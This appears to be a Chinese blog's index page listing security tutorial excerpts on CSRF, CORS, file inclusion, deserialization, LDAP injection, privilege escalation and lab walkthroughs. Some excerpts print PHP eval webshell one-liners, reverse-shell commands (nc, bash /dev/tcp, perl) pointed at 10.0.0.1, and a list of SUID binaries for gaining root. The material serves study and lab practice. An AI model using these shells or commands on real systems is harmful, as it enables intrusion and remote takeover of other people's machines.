安全漏洞
weixin_45116657
这个作者很懒,什么都没留下…
展开
-
CSRF攻击与防御
一、CSRF介绍CSRF(Cross-site request forgery)跨站请求伪造,也被称为“OneClick Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,...原创 2020-02-18 22:03:18 · 373 阅读 · 0 评论 -
CORS跨域漏洞学习
前言CORS全称为Cross-Origin Resource Sharing即跨域资源共享,用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。而CORS漏洞则是利用CORS技术窃取用户敏感数据。以往与CORS漏洞类似的JSONP劫持虽然已经出现了很多年,但由于部分厂商对此不够重视导致其仍在不断发展和扩散。一、CORS及SOP简介对CORS的介绍要从浏览器的同源策略开始说...原创 2020-02-15 17:51:52 · 1192 阅读 · 1 评论 -
谈谈跨域 & JSONP & JSONP劫持 安全问题
JSONP:我们开发时可能会有一些接口,前端向后端发送 XMLHTTPRequest ,后端返回 JSON 数据或其他以供前端展示 :但是由于 浏览器的同源策略 ,在浏览器层面禁止跨域访问读取数据。比如你是 A 域网站的用户, 张三前端想向 B 域读取你的信息时,则无法通过浏览器的 同源策略。 但是如果向其他域请求一段 js 代码或者请求加载远程图片,则可以访问。如果 ...原创 2020-02-14 10:37:16 · 329 阅读 · 0 评论 -
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html目录一、文件包含的基本概念1、要想成功利用文件包含漏洞,需要满足下面的条件(1)include()等函数通过动态变量的方式引入需要包含的文件(2)用户能够控制该动态变量二、LFI(Local File Include)本地文件包含1、00字符截断防御方法:...原创 2020-02-04 18:22:28 · 3054 阅读 · 0 评论 -
PHP反序列化漏洞说明
友情链接:PHP反序列化漏洞说明 序列化PHP程序为了保存和转储对象,提供了序列化的方法,序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。PHP序列化的函数为serialize,反序列化的函数为unserialize.举例说明:<?phpclass Test{ public $a...原创 2020-01-27 14:50:41 · 382 阅读 · 0 评论 -
LDAP注入入门学习指南
文章来源:https://mp.weixin.qq.com/s/qIEGcS1RG4_0oZ4jR3i34Q目录LDAP简介1、LDAP结构2、使用场景LDAP查询语法详细解释LDAP注入1、LDAP注入原因2、LDAP注意事项3、LDAP过滤器4、LDAP注入举栗ANDLDAP注入ORLDAP注入LDAP盲注LDAP靶场靶场截图...原创 2020-01-12 12:36:51 · 3225 阅读 · 1 评论 -
CORS跨域漏洞的学习
从浏览器的同源策略说起SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。浏览器的同源策略规定:不同域的客户端脚本在没有明确授权的情况下,不能读写对方的资源。那么何为同源呢,即两个站点需要满足同协议,同域名,同端口这三个条...原创 2019-11-15 15:37:18 · 3787 阅读 · 0 评论 -
小白黑客基础3389等端口入侵抓肉鸡
添加链接描述原创 2019-11-13 16:52:07 · 3110 阅读 · 0 评论 -
URL跳转漏洞学习总结
相关背景现在web应用越来越多的需要和其他第三方应用交互,以及在自身应用内部根据不同的逻辑引向不同的页面。例如一个典型的场景就是:web站点可以使用第三方账号(如qq,微博等)进行登录,在登录时就会发生跳转,如果在这个过程中没有做好安全策略就会产生安全漏洞。例如可以利用恶意的URL跳转进行钓鱼等。URL重定向(301/302)301重定向:当域名或者网址永久弃用后,为了方便可以将此域名或网...原创 2019-11-05 17:21:10 · 5222 阅读 · 1 评论 -
HTTP的危险方法(不安全的HTTP方法)
友情链接:Web安全|为什么要禁止除GET和POST之外的HTTP方法?不安全的HTTP方法我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GE...原创 2019-11-01 23:12:35 · 10188 阅读 · 3 评论 -
XML和JSON数据格式
友情链接:XML和JSON数据格式目录XMLDTD(文档类型定义)DTD实体JSON使用python解析JSON数据XML和JSON的区别XML的优缺点JSON的优缺点XML和JSON都是web存储和传输过程中数据的格式,其中JSON 使用比较广泛,主要用来前后端交互数据。XMLXML(Extensible Markup Language)扩展标记语言 ,是一种常用...原创 2019-10-31 11:17:29 · 243 阅读 · 0 评论 -
一句话木马总结
<?php @eval($_POST['cmd']);?><?php @assert($_POST[cmd]);?>https://www.jianshu.com/p/90473b8e6667原创 2019-10-25 11:25:38 · 405 阅读 · 0 评论 -
php提供4种方法执行系统外部命令
php提供4种方法执行系统外部命令:exec()、passthru()、system()、 shell_exec()。在开始介绍前,先检查下php配置文件php.ini中是有禁止这是个函数。找到 disable_functions,配置如下:disable_functions =如果“disable_functions=”后面有接上面四个函数,将其删除。默认php.ini配置文件中是不...原创 2019-10-24 20:50:33 · 123 阅读 · 0 评论 -
Windows中的用户和组以及用户密码处理
Windows中的用户和组以及用户密码处理原创 2019-10-24 16:41:56 · 152 阅读 · 0 评论 -
windows渗透技巧
Windows渗透技巧原创 2019-10-24 16:37:59 · 207 阅读 · 0 评论 -
phpMyAdmin开启远程登陆导致本地文件读取
phpMyAdmin开启远程登录导致本地文件读取原创 2019-10-22 20:07:13 · 286 阅读 · 0 评论 -
PHP伪协议总结
PHP伪协议总结PHP伪协议实现命令执行的其中姿势原创 2019-10-22 16:36:10 · 153 阅读 · 0 评论 -
WFUZZ使用教程
WFUZZ使用教程转载 2019-10-22 14:23:47 · 1724 阅读 · 0 评论 -
常见反弹shell总结
1、nc发送:nc -e /bin/sh 10.0.0.1 1234接收:nc -nlvp 12342、bash:bash -i >& /dev/tcp/10.0.0.1/8080 0>&13、perl:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getp...原创 2019-10-21 23:11:15 · 514 阅读 · 0 评论 -
SSH隧道技术----端口转发,socket代理
友情链接:https://www.cnblogs.com/fbwfbi/p/3702896.html本文的受众如果你遇到了以下问题,那么你应该阅读这篇文章:我听说过这种技术,我对它很感兴趣;我想在家里访问我在公司的机器(写程序,查数据,下电影)。公司为了防止我们用XX软件封锁了它的端口或者服务器地址。公司不让我们上XX网站,限制了网址甚至IP。公司不让我们看关于XX的信息,甚至花...原创 2019-10-21 21:10:14 · 449 阅读 · 0 评论 -
linux提权
讲Linux提权之前,我们先看看与Linux有关的一些知识:我们常说的Linux系统,指的是Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群,大类有以下几种:Linux内核Linux系统内核指的是一个由 Linus Torvalds 负责维护,提供硬件抽象层、硬盘及文件系统控制及多任务功能的系统核心程序。Linux内核版本...原创 2019-10-20 14:57:02 · 410 阅读 · 0 评论 -
Windows提权
友情链接:https://blog.csdn.net/qq_36119192/article/details/84887874目录1、系统漏洞提权远程溢出本地溢出2、数据库提权MySQL提权Oracle提权3、第三方软件提权FTP提权远程软件提权其他提权辅助windows提权技术分类大概有三种:1、系统溢出漏洞提权2、数据库提权3、第三方软件提权...原创 2019-10-20 14:29:16 · 193 阅读 · 0 评论 -
使用LCX进行内网端口转发
https://blog.csdn.net/kali_linux/article/details/48350343原创 2019-10-18 14:55:52 · 267 阅读 · 0 评论 -
常用一句话反弹shell总结
哈哈哈原创 2019-10-19 11:16:48 · 1332 阅读 · 0 评论 -
SNAT和DNAT简介
NAT(Net Address Trancelate)是将局域网里的内部地址(如192.168.0.x)转换成公网(Internet)上合法的IP地址(如202.202.12.11),以使内部地址能像有公网地址的主机一样上网。这个优于代理服务器,能做直接访问外部IP地址,但NAT往往会过滤掉部分UDP数据包。借助于NAT,私有(保留)地址的"内部"网络通过路由器发送数据包时,私有地址被转换成...原创 2019-10-13 14:38:38 · 2750 阅读 · 0 评论 -
靶机渗透测试实战(六)——DC-6
实验环境:目标机(DC-6)的IP:192.168.85.132攻击机kali的IP:192.168.85.130实验步骤:1、IP探测、扫描因为知道目标的ip,所以就不行探测了,我们直接进行ip的端口扫描,我们这里用的是nmap扫描。命令:nmap -sV -p- 192.168.85.132#-sV: 指定让Nmap进行版本侦测,或者扫描服务端口、名称和版本2、通过Fi...原创 2019-10-12 21:10:54 · 1235 阅读 · 2 评论 -
渗透中POC、EXP、Payload、Shellcode和exploit的区别
1、POC、EXP、Payload与ShellcodePOC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。.EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。.Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。.Shellcode:简单翻译 ’...转载 2019-10-10 10:05:09 · 3888 阅读 · 1 评论 -
快速破解各种散列hash [ hashcat入门篇 ]——连接
https://klionsec.github.io/2017/04/26/use-hashcat-crack-hash/原创 2019-09-25 16:09:25 · 1116 阅读 · 0 评论 -
常见的Web攻击手段之CSRF攻击
对于常规的Web攻击手段,如XSS、CRSF、SQL注入、(常规的不包括文件上传漏洞、DDoS攻击)等,防范措施相对来说比较容易,对症下药即可,比如XSS的防范需要转义掉输入的尖括号,防止CRSF攻击需要将cookie设置为httponly,以及增加session相关的Hash token码 ,SQL注入的防范需要将分号等字符转义,等等做起来虽然筒单,但却容易被忽视,更多的是需要从开发流程上来予...转载 2019-10-11 17:36:44 · 1159 阅读 · 0 评论 -
Web的基本工作原理、HTTP协议和URL说明
https://www.cnblogs.com/fwnboke/p/9114381.html原创 2019-09-30 22:04:16 · 165 阅读 · 0 评论 -
PHP表单(get,post)提交方式
连接:https://blog.csdn.net/broaden08/article/details/78993235PHP 表单处理PHP 超全局变量 $_GET 和 $_POST 用于收集表单数据(form-data)。$_GET 是通过 URL 参数传递到当前脚本的变量数组。$_POST 是通过 HTTP POST 传递到当前脚本的变量数组。有一点很重要的事情值得注意,当...原创 2019-09-30 21:44:28 · 921 阅读 · 0 评论 -
Linux上如何使用 Crontab定时任务
linux 系统则是由 cron (crond) 这个系统服务来控制的。Linux 系统上面原本就有非常多的计划性工作,因此这个系统服务是默认启动的。另 外, 由于使用者自己也可以设置计划任务,所以, Linux 系统也提供了使用者控制计划任务的命令 :crontab 命令。一、crond简介crond 是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与wind...原创 2019-09-30 11:36:47 · 755 阅读 · 0 评论 -
攻防:目录遍历漏洞简介
2014年3月22日,乌云漏洞报告平台爆出国内某著名网站存在漏洞,安全支付日志可被遍历下载,该事件在网络中迅速扩散,让用户意识到了目录浏览和目录遍历漏洞巨大的危害性,目录遍历这个古老的漏洞再次成为网络热点。本文将详细阐述目录遍历漏洞的原理,结合具体漏洞演示攻击过程并给出防御方法。一、什么是目录遍历漏洞目录遍历漏洞在国内外有许多不同的叫法,也可以叫做信息泄露漏洞、非授权文件包含漏洞等。目...原创 2019-09-27 16:27:03 · 2174 阅读 · 0 评论 -
渗透——目录扫描神器DirBuster用法
一、渗透测试的简介:渗透测试可以使用不同的方法进行,成为黑、灰和白盒。黑盒是指测试团队除了服务器的URL外,没有关于要测试的应用程序的任何以前的信息;白盒表示团队拥有目标、基础架构、软件版本、测试用户、开发信息等所有信息;灰盒是介于黑盒和白盒中之间的一个点。对于黑盒方法和灰盒方法,正如我们在上一章中看到的那样,侦察阶段对于测试团队发现应用程序所有者可以在白盒方法中提供的信息是必要的。继续...原创 2019-09-27 15:16:26 · 29530 阅读 · 3 评论 -
/etc/passwd 储存了用户重要信息
https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/原创 2019-09-25 16:41:22 · 474 阅读 · 0 评论 -
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
理论基础:1、使用arp-scan -l命令进行主机扫描,确定主机ip;arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...原创 2019-09-25 16:03:31 · 2978 阅读 · 0 评论 -
Linux下的用户、组和权限
目录:一:用户和组信息的查看查看用户信息;查看密码信息;查看组信息;特殊组wheel;二:用户和组信息管理用户管理;组管理;三:文件权限文件权限的查看;问价权限的修改;ACL控制权限setfacl、getfacl、Umask、Suid、Sgid、粘滞位;四:Linux中sudo、sudo -i、su、su -命令相关文章:linux用户方面的加固!!!前...原创 2019-09-24 20:50:04 · 659 阅读 · 0 评论 -
Linux下用SUID提权
关于SUID详细:Linux下的用户、组和权限SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。已知的可用来提权的Linux可行性的文件列表如下:nmapvimfindbashmorelessnanocp以下命令可以发现系统上运行的所有SUID可...原创 2019-09-24 10:47:44 · 353 阅读 · 0 评论 -
Linux中find命令基本使用方法
linux中find命令是系统中查找文件的命令,可以帮助用户快速找出自己所需要的文件。1、通过文件名查找:find -name 文件名find /etc/ -name passwd ###查找/etc目录下的passwd2、通过文件嵌套层数查找find -maxdepth 层数 ###查找文件时最大层数find -mindepth 层数 ###查找文件时最小层数例;我们查找...原创 2019-09-19 15:13:15 · 869 阅读 · 0 评论 -
DVWA系列(五)——使用Burpsuite进行CSRF(跨站请求伪造)
CSRF(Cross-site request forgery)CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与X...原创 2019-09-18 17:50:13 · 2142 阅读 · 1 评论